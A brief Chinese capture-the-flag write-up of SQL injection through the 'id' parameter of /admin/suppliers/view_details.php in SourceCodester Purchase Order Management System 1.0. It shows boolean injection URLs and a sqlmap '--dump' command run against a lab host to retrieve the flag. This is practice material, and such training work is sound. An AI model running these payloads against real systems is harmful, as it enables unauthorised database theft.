目录
靶标介绍
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
开启靶场
打开靶场,发现是一个登陆界面。根据靶场介绍,受影响的组件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。
直接访问给出的地址
判断是否存在 SQL注入漏洞
构造 id=1
使用 id = 1 and 1=1 和 id =1 and 1=2 发现页面无反应,然后使用单引号'闭合,发现页面报错,存在 SQL注入漏洞
http://eci-2zegpfp7230keryq2fa8.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php/?id=1' and 1=1 --+
http://eci-2zegpfp7230keryq2fa8.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php/?id=1' and 1=2 --+
sqlmap 获取 flag
使用 sqlmap 工具,直接跑
--dump:获取数据
python sqlmap.py -u "http://eci-2zegpfp7230keryq2fa8.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php/?id=1" --dump --batch
得到了 flag